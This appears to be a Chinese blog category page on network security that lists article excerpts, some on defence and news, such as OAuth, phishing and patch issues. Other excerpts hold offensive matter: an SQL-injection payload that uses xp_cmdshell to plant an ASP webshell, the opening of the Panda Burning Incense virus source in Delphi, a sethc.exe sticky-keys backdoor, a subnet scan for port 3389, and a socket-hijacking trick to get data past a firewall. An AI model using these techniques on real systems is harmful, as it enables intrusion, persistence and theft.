网络安全
文章平均质量分 63
Ejnstein
这个作者很懒,什么都没留下…
展开
-
OAUTH协议简介
摘要:OAUTH协议为用户资源的授权提供了一个安全的、开放而又简易的标准。与以往的授权方式不同之处是OAUTH的授权不会使第三方触及到用户的帐号信息(如用户名与密码),即第三方无需使用用户的用户名与密码就可以申请获得该用户资源的授权,因此OAUTH是安全的。同时,任何第三方都可以使用OAUTH认证服务,任何服务提供商都可以实现自身的OAUTH认证服务,因而OAUTH是开放的。业界提供了OAUTH的转载 2014-03-07 15:11:26 · 711 阅读 · 0 评论 -
[英语阅读]黑客以MJ之名传播病毒
Warning over Michael Jackson email virusSophos杀毒软件公司近日发出警告称,一种网络病毒正以流行天王迈克尔•杰克逊“神秘”歌曲和照片为掩护,通过电子邮件传播,网友收到此类邮件应立即删除。该公司设在新加坡的亚洲办事处发表声明说,附带这种病毒的电子邮件主题为“怀念迈克尔•杰克逊”,发件人为sarah@michaeljackson.com。发件人在邮件中提原创 2009-07-03 21:30:00 · 609 阅读 · 0 评论 -
[英语阅读]病毒今日爆发 愚人还是害人
April Fools Day computer virus could cause internet chaos today一种名为Conficker的蠕虫病毒有可能在4月1日“愚人节”当天大规模传播。自去年秋天以来,这种病毒已经感染了全世界超过1500万台电脑。据称,该蠕虫病毒编写者在现有的Conficker病毒脚本中表明,将于2009年4月1日将该病毒升级。届时,感染病毒的计算机访问网原创 2009-04-01 20:22:00 · 624 阅读 · 0 评论 -
一个键值让文件在重启过程中全替换
大家都知道,在Windows里,正在使用的文件是无法删除或者替换的,这些操作只会被告知“文件正在被占用,无法删除”,不过如果那样的话,系统文件在一启动的时候就被占用,Windows Update更新程序又是怎么替换这些文件的呢?其实,乾坤全在注册表的一个小小键值中。 多数需要修改系统文件的安装程序,都会在系统重启前向注册表的“自动替换项”中写入键值,具体位置为[HKEY_LOCAL_M转载 2008-12-02 16:56:00 · 535 阅读 · 0 评论 -
GFI EndPointSecurity产品介绍
相信您已经购买了网络防病毒软件、防火墙、邮件和网站内容安全软件。然而,任何用户都可以进入办公室,通过USB口提取或存入大量的数据。这种操作将会产生一个严重的威胁:用户可以取走机密数据,也可能引入病毒、特洛伊和其他非法软件等,影响您网络和公司的正常运作。可是,作为管理者,您无法控制这一切的发生!根据2005 FBI Computer Crime Survey,有44%的公司宣称其网络入侵是来自公转载 2008-12-01 17:49:00 · 1043 阅读 · 0 评论 -
只能用IP访问,不能用域名-KB951748补丁引起的网络连接故障
最近碰到一件怪事,单位的多台电脑都无法上网了,查看网络连接发现连接状态全部是空的,将网卡驱动删除重新安装也没有任何作用,百思不得其解之际,突然想到最近的DNS漏洞问题,难道是因为这个漏洞补丁的问题?查看了一下360安全卫士的漏洞补丁记录,发现KB951748补丁安装失败,看来是瑞星阻止了这个补丁的安装,将瑞星监控停止,重新安装补丁,这次成功安装上了,但是故障依旧。在控制面板将KB951748更转载 2008-11-24 23:48:00 · 1427 阅读 · 2 评论 -
网络钓鱼 phishing
如果有一天你查看博客时收到了这样的信息:嘿,请查看这篇有关你的有趣博客,那么千万不要点击,这是“网络钓鱼”式攻击手段。点击后,用户将被指向一个虚假的登录页面,并被窃取登录密码。更糟糕的是,有些网银客户还因此被窃取了银行卡账号密码等信息,导致账户中的存款不翼而飞。请看外电的报道:This weekend, Twitter admitted that it is the most rec原创 2009-01-07 20:49:00 · 1443 阅读 · 0 评论 -
远程桌面禁用本地资源,磁盘驱动器,串行口,复制文件等等
在组策略里面禁用以上设备的重定向可以实现这个功能这个问题我也是在解决用户的问题时发现的,用户在使用远程桌面连接到其他服务器时可以直接将远端桌面上的文件直接复制下来,也可以将本地的文件直接复制到远端桌面上去,之前我只知道可以在远端桌面和本地间直接拷贝文字内容,或者是屏幕截图。 而现在他们可以直接在远端桌面和本地间直接拷贝文件,后来我发现实际上在使用远程桌面连接的时候在mstsc的一个选项的地方可以设转载 2009-09-19 22:35:00 · 1523 阅读 · 0 评论 -
黑掉ATM的机会:写恶意程序黑掉后台系统
要黑银行的ATM有两条路:编个恶意程序,直接骗过柜员机上那个漏洞百出的Windows系统;或者先黑银行的后台系统,盗取客户信息之后再大模大样到ATM取钱。这两条路,现在都有得走。网络安全研究人员杰克(Barnaby Jack)在美国拉斯维加斯的黑帽安全会议(Black Hat)上原本有一个精彩的演讲,他准备演示如何入侵ATM(自动柜员机),以证明多种不同型号的ATM存在安全隐患。我一直很喜欢《终结转载 2009-10-10 10:29:00 · 825 阅读 · 0 评论 -
Tip: Run process in system account (sc.exe)
<br />I have recently been doing some research on windows services, and have been working on some command line parsing, so while experimenting I thought of a nice little trick to run a process in the System account (And have the window be displayed) withou原创 2011-05-06 08:48:00 · 1078 阅读 · 1 评论 -
Google Open API授权认证体系
Google Open API授权认证体系 终端用户在使用第三方软件访问用户受保护的资源时,都需要终端用户授权给第三方软件。如用户在使用第三方软件需要访问或者操作用户在Google上注册的服务(Gmail服务,Calendar服务等)时,就需要用户将相关资源的权限授权给该软件。Google除了提供了很多个性化的服务外,同时提供了一套完整的服务授权体系。Google的服务认证体系包含了多种认转载 2014-03-07 15:19:08 · 1018 阅读 · 0 评论 -
你的WEP网络很安全?5分钟破解给你看
我总是提醒人们对无线网络使用WEP (Wired Equivalent Privacy)加密技术其实是自欺欺人,但人们还是在使用它。今天我就来真正告诉你WEP是多么不安全,看我是怎么在五分钟之内破解一个WEP加密的无线网络的。免责声明:这篇文章仅用于学习目的,它告诉你为什么你该升级一下路由器或者采取其他方式加强一下无线网络安全。破解不属于你的无线网络是一种刑事犯罪,而如果你蓄意这么做,转载 2014-01-27 16:01:42 · 1675 阅读 · 0 评论 -
网页微信登录原理
这两天一直在看网页版的微信,对网页微信登录原理进行了思考。网页版微信地址:https://wx.qq.com/网页微信登录方法:1.打开网页版微信地址,会看到一个二维码。2.打开手机微信客户端,再点击界面上的如下按钮:3.扫面二维码,手机客户端会提示是否登录,点击确定便可登录成功。 对于普通用户来说这中登录方式可能没太特别的地方,转载 2013-06-27 16:12:23 · 15075 阅读 · 2 评论 -
How to properly convert SecureString to String
It feels like forever since SecureString has been introduced in the .Net Framework and yet I keep seeing it being mishandled, in particular by code that returns or receives passwords in clear text, so转载 2013-06-18 19:39:19 · 1043 阅读 · 0 评论 -
Are You Using .NET Remoting? Stop it!
James Forshaw, 24th July 2012In May 2012 Microsoft released MS12-035 which was a security update for all versions of the .NET framework (including v4.0) based on some security research I perfo转载 2012-10-15 13:34:34 · 596 阅读 · 0 评论 -
Are You Using .NET Remoting? Stop it!
James Forshaw, 24th July 2012In May 2012 Microsoft released MS12-035 which was a security update for all versions of the .NET framework (including v4.0) based on some security research I perfo转载 2012-10-15 13:33:00 · 261 阅读 · 0 评论 -
Fix "\\computer is not accessible. You might not have permission to use this network resource”
I’ve previously written an article on how to network two computers together that are running Windows XP. I’ve also written about a cool program called WiPeer that lets youconnect two computers wir转载 2011-11-02 13:24:27 · 10003 阅读 · 0 评论 -
你应知道的十二个名扬的白帽黑客
这些IT安全专家时时刻刻在寻找麻烦,但他们却是站在正义的一边。这些白帽安全研究人员是一些讲道德的黑客,他们的发现经常能够扭转战局,因为他们总是在努力领先地下的黑帽兄弟们一步。这些IT安全专家时时刻刻在寻找麻烦,但他们却是站在正义的一边。这些白帽安全研究人员是一些讲道德的黑客,他们转载 2011-07-06 21:59:17 · 1346 阅读 · 0 评论 -
小心!QQ和MSN聊天记录也会随时被监控
大家经常用来聊天的QQ、MSN,也分分钟会令你的私密公开! 接到伪装的木马程序后,家中电脑的摄像头可被远程操控问题经本报报道(详见家中欢爱遭遥控视频偷窥 员工举动尽收老板电脑)后,引起市民热议。不少市民致电本报表示,就算没有装摄像头,平常的QQ、MSN聊天工具,也随时会被监控聊天记录。 "侦探软件" 远程查看QQ记录 记者昨日在不少软件下载网站上,发现了大量声称可以偷看聊天记录的软件。 某网站推介转载 2008-11-08 13:53:00 · 8131 阅读 · 0 评论 -
大学生黑客攻击政府网站牟利 两月赚200多万
十余名大学生中,有的是在读生,有的是刚参加工作,他们之间大多数并不相识。他们在交易过程中只见钱而不见人,其中一人非法牟利达200多万元。为了牟利,他们先后入侵了江西、湖北、贵州、四川、江苏等11个政府网站,修改相关数据700余个。 大学生黑客攻击政府网站牟利 2008年9月27日,江西警方以涉嫌破坏计算机信息系统罪,将李士扬、王晓娃等6名犯罪嫌疑人向人民检察院移交起诉;南昌市经济开发区人民检察院以转载 2008-11-06 11:00:00 · 7903 阅读 · 2 评论 -
跨站脚本详细说明
轻松注册,推荐一个网站获得20元以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章,抱着知道总比不知道好的想法,翻译整理了一下,原文在偶主页的collection目录里,错误之处请多多指点。OK,go............什么是跨站脚本(CSS/XSS)? 我们所说原创 2007-10-12 15:05:00 · 492 阅读 · 0 评论 -
一种新的穿透防火墙的数据传输技术
使用该技术背景:在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么). 针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:1. 找出目标进程2.转载 2007-09-10 03:12:00 · 881 阅读 · 0 评论 -
路由器原理及路由协议
近十年来,随着计算机网络规模的不断扩大,大型互联网络(如Internet)的迅猛发展,路由技术在网络技术中已逐渐成为关键部分,路由器也随之成为最重要的网络设备。用户的需求推动着路由技术的发展和路由器的普及,人们已经不满足于仅在本地网络上共享信息,而希望最大限度地利用全球各个地区、各种类型的网络资源。而在目前的情况下,任何一个有一定规模的计算机网络(如企业网、校园网、智能大厦等),无论采用的是快速以转载 2007-08-28 21:04:00 · 1882 阅读 · 0 评论 -
最有用的网络命令
1、测试物理网络 命令:ping 192.168.0.8 -t ,参数-t是等待用户去中断测试2.查看DNS、IP、Mac等信息 A.Win98:winipcfg B.Win2000以上:Ipconfig/all3.网络信使 命令:Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段 命令:net stop messenger 停止信使服务,也可以在面板-服务修改转载 2007-05-14 22:55:00 · 985 阅读 · 0 评论 -
[熊猫烧香]核心源码(Delphi模仿版本)
program Japussy;uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5转载 2007-07-02 23:35:00 · 1295 阅读 · 0 评论 -
黑客技巧之DOS命令扫描网段的端口
不需要任何工具,DOS命令扫描一个网段的全部端口!在Windows2000下开一个DOS窗口,然后执行for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389这样192.168.0.x这个段的所有开放3389端口得主机都会暴露。这条命令执行后,会在任务栏开254个小窗口。然后telnet链接失败的窗口会在大约5秒后自动原创 2007-02-17 12:07:00 · 1543 阅读 · 0 评论 -
“陷阱”病毒源代码大揭密
7月初在我国出现了一种名叫“陷阱”(Trap)的新型恶性病毒,并在7月5日全面爆发,目前国内已有不少的网站和用户遭受“陷阱”的袭击,造成网络系统瘫痪、文件丟失现象严重。该病毒是一种网络脚本语言病毒,并是同时使用了VBScript 和 JavaScript 两种脚本语言编写的,通过OutLook电子邮件传播(不打开邮件也能被感染)、感染文件传播,传播能力较强,并能直接攻击Microsoft I转载 2007-02-18 18:14:00 · 1657 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;-- ? echo ^ >c:/mu.asp2、 显示SQL系统版本: ? http://192转载 2007-10-17 14:21:00 · 1049 阅读 · 0 评论 -
最酷的windows后门
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。参考McafeeAvertLabs:http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/XP:将转载 2007-10-17 15:52:00 · 1306 阅读 · 0 评论 -
用户权限管理经典篇
实现业务系统中的用户权限管理--设计篇 B/S系统中的权限比C/S中的更显的重要,C/S系统因为具有特殊的客户端,所以访问用户的权限检测可以通过客户端实现或通过客户端+服务器检测实现,而B/S中,浏览器是每一台计算机都已具备的,如果不建立一个完整的权限检测,那么一个“非法用户”很可能就能通过浏览器轻易访问到B/S系统中的所有功能。因此B/S业务系统都需要有一个或多个权限系统来实现访问权限检测转载 2007-11-06 11:56:00 · 656 阅读 · 0 评论 -
Windows XP 用户密码简单修改方法
Windows XP启动脚本(startup scripts)是计算机在登录屏幕出现之前运行的批处理文件,它的功能类似于Windows 9.X和DOS中的自动执行批处理文件autoexec.bat。 利用这个特性,可以编写一个批处理文件重新设置用户密码,并将它加入启动脚本中,这样就达到了目的。 以下是具体步骤(假设系统目录为C:/Windows)。 1、使用Windows98转载 2008-10-23 10:58:00 · 765 阅读 · 0 评论 -
保护公司机密
Every company has secrets. Some confidential company information can be so important that if your competitors got hold of it, your company could suffer very serious financial losses.每家公司都有秘密。公司里有些机密原创 2008-08-26 14:56:00 · 699 阅读 · 0 评论 -
WMIC 全新的超级命令行管理工具
微软Windows Server的图形界面接口在为网络管理提供便利的同时,因其消耗资源偏大、操作缓慢而颇受Windows管理员的微词,为提供一个图形管理界面之外的另一种选择,微软推出了集WMI的强大与命令行的简洁于一身的全新的命令行管理工具WMIC。加入了WMIC的Windows server 2003的命令行,据称可以完成几乎所有的管理任务。 以DOS起家的微软,最终靠图形界面一统了天转载 2008-08-05 14:06:00 · 870 阅读 · 0 评论 -
通过WMIC命令远程打开远程计算机的远程桌面(Remote Desktop)
虽然标题有点拗口,不过这个命令确实挺有用的。往往辛辛苦苦装了一台Server,回到家里本想远程桌面爽一下,却忘了打开远程的功能,这时这条命令就有用了。 wmic /node:"[full machine name]" /USER:"[domain]/[username]" PATH win32_terminalservicesetting WHERE (__Class!="") CAL原创 2008-08-05 14:05:00 · 5396 阅读 · 0 评论 -
安全专家支招防范黑客攻击九大方法
黑客攻击如何防范?我们一起来看看卡巴斯基的安全专家如何给大家进行解答。 一、计算机的设置 1、关闭“文件和打印共享” 文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两转载 2007-11-23 12:13:00 · 2203 阅读 · 0 评论 -
Configuring Security Policy Using the .NET Framework Configuration Tool (Mscorcfg.msc)
Control Panel->Administrative Tools->Microsoft .NET Framework Configuration, right click on Runtime Security Policy, select Trust Assembly, follow the instructions.原创 2008-01-21 16:05:00 · 2807 阅读 · 0 评论 -
Web页面嵌入复杂WinForm控件权限问题
一、如果在web页面中嵌入复杂winform控件客户端在通过IE访问的时候,必须把该站点添加到受信任站点中而且还需要更改受信任站点区域安全性。这样既降低了系统的安全性,又对客户访问带来不便(第一访问之前都需要做如此复杂的操作),但是这样在做系统(CS/BS)时会节省大量的代码和工作量。为了解决这个弊端本人经过潜心研究,终于发现只要为站点创建代码组就可以了。具体操作如下: 1、打开Microsoft转载 2008-01-23 15:17:00 · 1557 阅读 · 0 评论 -
Windows Update Downloader:系统补丁离线打
如果要让你给“windows补丁、杀毒软件、防火墙”这三项按照重要程度依次排序,你认为最重要的是哪个?我会选择“windows补丁”,因为补丁修复的是系统深层次的问题,而另两项仅仅是“外围防护”,难免会有“失守”的时候,当年的冲击波病毒事件就是最好的例子,很多装了杀软和防火墙的用户还是没能逃过“重启”的厄运。既然补丁那么重要,那就打呗。可是偏偏这网速不争气,新装的系统要下那么多补丁,恐怕一原创 2008-01-22 09:12:00 · 6987 阅读 · 0 评论 -
常见SQL Server 2000漏洞及其相关利用
单位的小王学习SQL Server已有一段时间了,已经做了个不错的管理系统,有次小王让我帮着看看库的设计有没有问题,其间我发现他的安全意识非常薄弱,这也许是初学者容易忽视的问题,本文探讨一些SQL Server常见的安全问题,是给初入SQL Server的人看的,写的肯定很絮叨,高手勿读。本文的用的是SQL Server 2000,下文中都简写为SQL Server。 一、空口令或弱口令转载 2007-02-17 13:21:00 · 1506 阅读 · 0 评论